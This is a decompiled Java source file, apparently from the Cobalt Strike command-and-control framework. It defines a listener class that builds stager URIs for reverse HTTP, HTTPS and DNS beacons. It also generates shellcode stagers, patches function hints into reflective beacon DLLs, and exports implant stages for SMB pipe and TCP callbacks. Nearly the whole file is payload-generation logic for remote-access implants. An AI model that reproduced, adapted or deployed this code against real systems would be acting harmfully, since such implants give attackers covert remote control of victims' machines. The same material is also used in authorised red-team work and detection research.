/*
 * Decompiled with CFR 0.152.
 */
package common;

import aggressor.AggressorClient;
import aggressor.DataManager;
import aggressor.DataUtils;
import beacon.BeaconPayload;
import beacon.setup.BeaconDLL;
import c2profile.Profile;
import common.AssertUtils;
import common.BeaconEntry;
import common.CommonUtils;
import common.ListenerConfig;
import dialog.DialogUtils;
import java.util.HashMap;
import java.util.Map;
import java.util.Stack;
import pe.BeaconLoader;
import sleep.runtime.Scalar;
import sleep.runtime.SleepUtils;
import stagers.Stagers;

public class ScListener {
    protected Map options;
    protected Profile c2profile;
    protected byte[] pubkey;
    protected ListenerConfig config;

    public ScListener(AggressorClient aggressorClient, Map map2) {
        this(aggressorClient.getData(), map2);
    }

    public ScListener(DataManager dataManager, Map map2) {
        this(DataUtils.getProfile(dataManager), DataUtils.getPublicKey(dataManager), map2);
    }

    public ScListener(Profile profile, byte[] byArray, Map map2) {
        this.options = map2;
        this.c2profile = profile.getVariantProfile(this.getVariantName());
        this.pubkey = byArray;
        this.config = new ListenerConfig(this.c2profile, this);
    }

    public byte[] getPublicKey() {
        return this.pubkey;
    }

    public String getVariantName() {
        return DialogUtils.string(this.options, "profile");
    }

    public String getHostHeader() {
        return DialogUtils.string(this.options, "althost");
    }

    public Profile getProfile() {
        return this.c2profile;
    }

    public String getName() {
        return DialogUtils.string(this.options, "name");
    }

    public String getPayload() {
        return DialogUtils.string(this.options, "payload");
    }

    public ListenerConfig getConfig() {
        return this.config;
    }

    public int getBindPort() {
        if (!DialogUtils.isNumber(this.options, "bindto")) {
            return this.getPort();
        }
        return DialogUtils.number(this.options, "bindto");
    }

    public boolean isLocalHostOnly() {
        return DialogUtils.bool(this.options, "localonly");
    }

    public int getPort() {
        return DialogUtils.number(this.options, "port");
    }

    public String getStagerHost() {
        return DialogUtils.string(this.options, "host");
    }

    public String getCallbackHosts() {
        return DialogUtils.string(this.options, "beacons");
    }

    public String getCallbackHost() {
        String[] stringArray = this.getCallbackHosts().split(",\\s*");
        if (stringArray.length == 0) {
            return "";
        }
        return stringArray[0];
    }

    public String getStrategy() {
        return DialogUtils.string(this.options, "strategy");
    }

    public void setStrategy(String string) {
        this.options.put("strategy", string);
    }

    public String getMaxRetryStrategy() {
        return DialogUtils.string(this.options, "maxretry", "none");
    }

    public String getProxyString() {
        return DialogUtils.string(this.options, "proxy");
    }

    public void setProxyString(String string) {
        this.options.put("proxy", string);
    }

    public String getDNSResolverString() {
        return DialogUtils.string(this.options, "dnsresolver");
    }

    public void setDNSResolverString(String string) {
        this.options.put("dnsresolver", string);
    }

    public String getPipeName() {
        return DialogUtils.string(this.options, "port");
    }

    public String getPipeName(String string) {
        return "\\\\" + string + "\\pipe\\" + this.getPipeName();
    }

    public String getStagerURI(String string) {
        if ("windows/beacon_http/reverse_http".equals(this.getPayload())) {
            String string2 = "x86".equals(string) ? this.getConfig().getURI() : this.getConfig().getURI_X64();
            return "http://" + this.getStagerHost() + ":" + this.getPort() + string2;
        }
        if ("windows/beacon_https/reverse_https".equals(this.getPayload())) {
            String string3 = "x86".equals(string) ? this.getConfig().getURI() : this.getConfig().getURI_X64();
            return "https://" + this.getStagerHost() + ":" + this.getPort() + string3;
        }
        if ("windows/foreign/reverse_http".equals(this.getPayload()) && "x86".equals(string)) {
            String string4 = CommonUtils.MSFURI();
            return "http://" + this.getStagerHost() + ":" + this.getPort() + string4;
        }
        if ("windows/foreign/reverse_https".equals(this.getPayload()) && "x86".equals(string)) {
            String string5 = CommonUtils.MSFURI();
            return "https://" + this.getStagerHost() + ":" + this.getPort() + string5;
        }
        return "";
    }

    public boolean isExternalC2() {
        return "<ExternalC2.Anonymous>".equals(this.getName());
    }

    public boolean hasStager() {
        return this.hasStager("x86");
    }

    public Map toMap() {
        return new HashMap(this.options);
    }

    protected boolean hasGuards() {
        return !CommonUtils.isNullOrEmpty(this.getGuards());
    }

    public String getGuards() {
        return DialogUtils.string(this.options, "guards");
    }

    public void setGuards(String string) {
        this.options.put("guards", string);
    }

    public Map getC2Info(String string) {
        HashMap<String, String> hashMap = new HashMap<String, String>();
        hashMap.put("bid", string);
        hashMap.put("domains", this.getCallbackHosts());
        hashMap.put("port", this.getPort() + "");
        HashMap<String, String> hashMap2 = new HashMap<String, String>();
        hashMap2.put("windows/beacon_dns/reverse_dns_txt", "dns");
        hashMap2.put("windows/beacon_http/reverse_http", "http");
        hashMap2.put("windows/beacon_https/reverse_https", "https");
        hashMap.put("proto", (String)hashMap2.get(this.getPayload()));
        return hashMap;
    }

    public boolean isForeign() {
        if ("windows/foreign/reverse_http".equals(this.getPayload())) {
            return true;
        }
        return "windows/foreign/reverse_https".equals(this.getPayload());
    }

    public boolean hasStager(String string) {
        if ("windows/foreign/reverse_http".equals(this.getPayload())) {
            return "x86".equals(string);
        }
        if ("windows/foreign/reverse_https".equals(this.getPayload())) {
            return "x86".equals(string);
        }
        if ("windows/beacon_bind_pipe".equals(this.getPayload())) {
            return false;
        }
        if ("windows/beacon_bind_tcp".equals(this.getPayload())) {
            return false;
        }
        if ("windows/beacon_reverse_tcp".equals(this.getPayload())) {
            return false;
        }
        if ("windows/beacon_extc2".equals(this.getPayload())) {
            return false;
        }
        if ("windows/beacon_dns/reverse_dns_txt".equals(this.getPayload())) {
            return this.c2profile.option(".host_stage") && "x86".equals(string);
        }
        if ("windows/beacon_extc2".equals(this.getPayload())) {
            return false;
        }
        return this.c2profile.option(".host_stage");
    }

    public byte[] getPayloadStager(String string) {
        return Stagers.shellcode(this, this.getPayload(), string);
    }

    public BeaconDLL _getPayloadStager(String string) {
        BeaconDLL beaconDLL = new BeaconDLL();
        beaconDLL.fileName = "dont.know.dll";
        beaconDLL.originalDLL = this.getPayloadStager(string);
        beaconDLL.peProcessedDLL = beaconDLL.originalDLL;
        beaconDLL.isForeignListener = true;
        return beaconDLL;
    }

    public byte[] getPayloadStagerLocal(int n, String string) {
        return Stagers.shellcodeBindTcp(this, n, string);
    }

    public byte[] getPayloadStagerPipe(String string, String string2) {
        return Stagers.shellcodeBindPipe(this, string, string2);
    }

    protected String getFile(String string, String string2) {
        if ("x86".equals(string2)) {
            return "resources/" + string + ".dll";
        }
        return "resources/" + string + ".x64.dll";
    }

    public byte[] export(String string) {
        BeaconDLL beaconDLL = this.A(string, 0, null);
        return beaconDLL.peProcessedDLL;
    }

    public byte[] exportLocal(AggressorClient aggressorClient, String string, String string2, int n, String string3, String string4, String string5) {
        BeaconDLL beaconDLL = this.A(string2, n, aggressorClient, string3, string4, string5);
        if (!BeaconLoader.hasLoaderHint(aggressorClient, beaconDLL.peProcessedDLL, string2)) {
            return this.A(beaconDLL, aggressorClient, string2);
        }
        BeaconEntry beaconEntry = DataUtils.getBeacon(aggressorClient.getData(), string);
        if (beaconEntry == null || beaconEntry.isEmpty()) {
            return beaconDLL.peProcessedDLL;
        }
        if (!beaconEntry.arch().equals(string2)) {
            return beaconDLL.peProcessedDLL;
        }
        int n2 = BeaconLoader.getLoaderHint(beaconDLL.peProcessedDLL, string2, "GetModuleHandleA");
        int n3 = BeaconLoader.getLoaderHint(beaconDLL.peProcessedDLL, string2, "GetProcAddress");
        byte[] byArray = beaconEntry.getFunctionHint("GetModuleHandleA");
        byte[] byArray2 = beaconEntry.getFunctionHint("GetProcAddress");
        System.arraycopy(byArray, 0, beaconDLL.peProcessedDLL, n2, byArray.length);
        System.arraycopy(byArray2, 0, beaconDLL.peProcessedDLL, n3, byArray2.length);
        return this.A(beaconDLL, aggressorClient, string, string2, n, byArray, byArray2);
    }

    public byte[] export(AggressorClient aggressorClient, String string) {
        return this.export(aggressorClient, string, 0);
    }

    public byte[] export(AggressorClient aggressorClient, String string, String string2, String string3) {
        String string4 = null;
        return this.export(aggressorClient, string, 0, string2, string3, string4);
    }

    public byte[] export(AggressorClient aggressorClient, String string, int n) {
        String string2 = null;
        String string3 = null;
        String string4 = null;
        return this.export(aggressorClient, string, n, string2, string3, string4);
    }

    public byte[] export(AggressorClient aggressorClient, String string, int n, String string2, String string3) {
        String string4 = null;
        BeaconDLL beaconDLL = this.A(string, n, aggressorClient, string2, string3, string4);
        return this.A(beaconDLL, aggressorClient, string);
    }

    public byte[] export(AggressorClient aggressorClient, String string, int n, String string2, String string3, String string4) {
        BeaconDLL beaconDLL = this.A(string, n, aggressorClient, string2, string3, string4);
        return this.A(beaconDLL, aggressorClient, string);
    }

    private BeaconDLL A(String string, int n, AggressorClient aggressorClient) {
        String string2 = null;
        String string3 = null;
        String string4 = null;
        return this.A(string, n, aggressorClient, string2, string3, string4);
    }

    private BeaconDLL A(String string, int n, AggressorClient aggressorClient, String string2, String string3, String string4) {
        if ("windows/foreign/reverse_http".equals(this.getPayload())) {
            return this._getPayloadStager(string);
        }
        if ("windows/foreign/reverse_https".equals(this.getPayload())) {
            return this._getPayloadStager(string);
        }
        BeaconPayload beaconPayload = new BeaconPayload(this, aggressorClient, string, n, string3, string4);
        if ("windows/beacon_http/reverse_http".equals(this.getPayload())) {
            return beaconPayload.exportBeaconStageHTTP(this.getPort(), this.getCallbackHosts(), false, false, string2);
        }
        if ("windows/beacon_https/reverse_https".equals(this.getPayload())) {
            return beaconPayload.exportBeaconStageHTTP(this.getPort(), this.getCallbackHosts(), false, true, string2);
        }
        if ("windows/beacon_dns/reverse_dns_txt".equals(this.getPayload())) {
            return beaconPayload.exportBeaconStageDNS(this.getPort(), this.getCallbackHosts(), true, false, string2);
        }
        if ("windows/beacon_bind_pipe".equals(this.getPayload()) && this.isExternalC2()) {
            return beaconPayload.exportExternalC2Stage();
        }
        if ("windows/beacon_bind_pipe".equals(this.getPayload())) {
            return beaconPayload.exportSMBStage(string2);
        }
        if ("windows/beacon_bind_tcp".equals(this.getPayload())) {
            return beaconPayload.exportBindTCPStage(string2);
        }
        if ("windows/beacon_reverse_tcp".equals(this.getPayload())) {
            return beaconPayload.exportReverseTCPStage();
        }
        AssertUtils.TestFail("Unknown payload '" + this.getPayload() + "'");
        BeaconDLL beaconDLL = new BeaconDLL();
        beaconDLL.fileName = "unknown.beacon.dll";
        beaconDLL.originalDLL = new byte[0];
        beaconDLL.peProcessedDLL = new byte[0];
        return beaconDLL;
    }

    public int getCustomLoaderSizeKB(AggressorClient aggressorClient, String string, String string2) {
        Stack<Scalar> stack = new Stack<Scalar>();
        stack.push(SleepUtils.getScalar(string2));
        stack.push(SleepUtils.getScalar(string));
        String string3 = aggressorClient.getScriptEngine().format("BEACON_RDLL_SIZE", stack);
        int n = 5;
        if (string3 != null) {
            try {
                n = Integer.parseInt(string3);
            }
            catch (NumberFormatException numberFormatException) {
                aggressorClient.getScriptEngine().perror("BEACON_RDLL_SIZE hook returned an unparsable size (" + string3 + "). Valid values (in KB) are: 0, 5, 100", true);
                aggressorClient.getScriptEngine().pinfo("BEACON_RDLL_SIZE hook will use the valid size of 5", true);
            }
        }
        switch (n) {
            case 5: {
                return n;
            }
            case 0: 
            case 100: {
                aggressorClient.getScriptEngine().pinfo("BEACON_RDLL_SIZE hook returned size: " + n, true);
                return n;
            }
        }
        aggressorClient.getScriptEngine().perror("BEACON_RDLL_SIZE hook returned an invalid size (" + string3 + "). Valid values (in KB) are: 0, 5, 100", true);
        aggressorClient.getScriptEngine().pinfo("BEACON_RDLL_SIZE hook will use the valid size of 5", true);
        return 5;
    }

    private byte[] A(BeaconDLL beaconDLL, AggressorClient aggressorClient, String string) {
        if (beaconDLL.isForeignListener) {
            return beaconDLL.originalDLL;
        }
        Stack<Scalar> stack = new Stack<Scalar>();
        stack.push(SleepUtils.getScalar(string));
        if (beaconDLL.usesCustomLoaderSize()) {
            stack.push(SleepUtils.getScalar(beaconDLL.customDLL));
            stack.push(SleepUtils.getScalar(beaconDLL.customFileName));
        } else {
            stack.push(SleepUtils.getScalar(beaconDLL.originalDLL));
            stack.push(SleepUtils.getScalar(beaconDLL.fileName));
        }
        String string2 = aggressorClient.getScriptEngine().format("BEACON_RDLL_GENERATE", stack);
        if (string2 != null && string2.length() > 0) {
            String string3 = "";
            string3 = beaconDLL.usesCustomLoaderSize() ? beaconDLL.customFileName : beaconDLL.fileName;
            String string4 = "Using user modified reflective DLL! DLLName=" + string3 + " Arch=" + string;
            aggressorClient.getScriptEngine().pinfo(string4, true);
            return CommonUtils.toBytes(string2);
        }
        return beaconDLL.peProcessedDLL;
    }

    private byte[] A(BeaconDLL beaconDLL, AggressorClient aggressorClient, String string, String string2, int n, byte[] byArray, byte[] byArray2) {
        Stack<Scalar> stack = new Stack<Scalar>();
        stack.push(SleepUtils.getScalar(byArray2));
        stack.push(SleepUtils.getScalar(byArray));
        stack.push(SleepUtils.getScalar(string));
        stack.push(SleepUtils.getScalar(string2));
        if (beaconDLL.usesCustomLoaderSize()) {
            stack.push(SleepUtils.getScalar(beaconDLL.customDLL));
            stack.push(SleepUtils.getScalar(beaconDLL.customFileName));
        } else {
            stack.push(SleepUtils.getScalar(beaconDLL.originalDLL));
            stack.push(SleepUtils.getScalar(beaconDLL.fileName));
        }
        String string3 = aggressorClient.getScriptEngine().format("BEACON_RDLL_GENERATE_LOCAL", stack);
        if (string3 != null && string3.length() > 0) {
            String string4 = "";
            string4 = beaconDLL.usesCustomLoaderSize() ? beaconDLL.customFileName : beaconDLL.fileName;
            String string5 = "Using user modified reflective DLL (local)! DLLName=" + string4 + " Arch=" + string2 + " BeaconID=" + string;
            aggressorClient.getScriptEngine().pinfo(string5, true);
            return CommonUtils.toBytes(string3);
        }
        return beaconDLL.peProcessedDLL;
    }

    public String toString() {
        if ("windows/beacon_bind_tcp".equals(this.getPayload())) {
            if (this.isLocalHostOnly()) {
                return this.getPayload() + " (127.0.0.1:" + this.getPort() + ")";
            }
            return this.getPayload() + " (0.0.0.0:" + this.getPort() + ")";
        }
        if ("windows/beacon_bind_pipe".equals(this.getPayload())) {
            return this.getPayload() + " (\\\\.\\pipe\\" + this.getPipeName() + ")";
        }
        if ("windows/beacon_reverse_tcp".equals(this.getPayload())) {
            return this.getPayload() + " (" + this.getStagerHost() + ":" + this.getPort() + ")";
        }
        if (this.isForeign()) {
            return this.getPayload() + " (" + this.getStagerHost() + ":" + this.getPort() + ")";
        }
        return this.getPayload() + " (" + this.getCallbackHost() + ":" + this.getPort() + ")";
    }
}

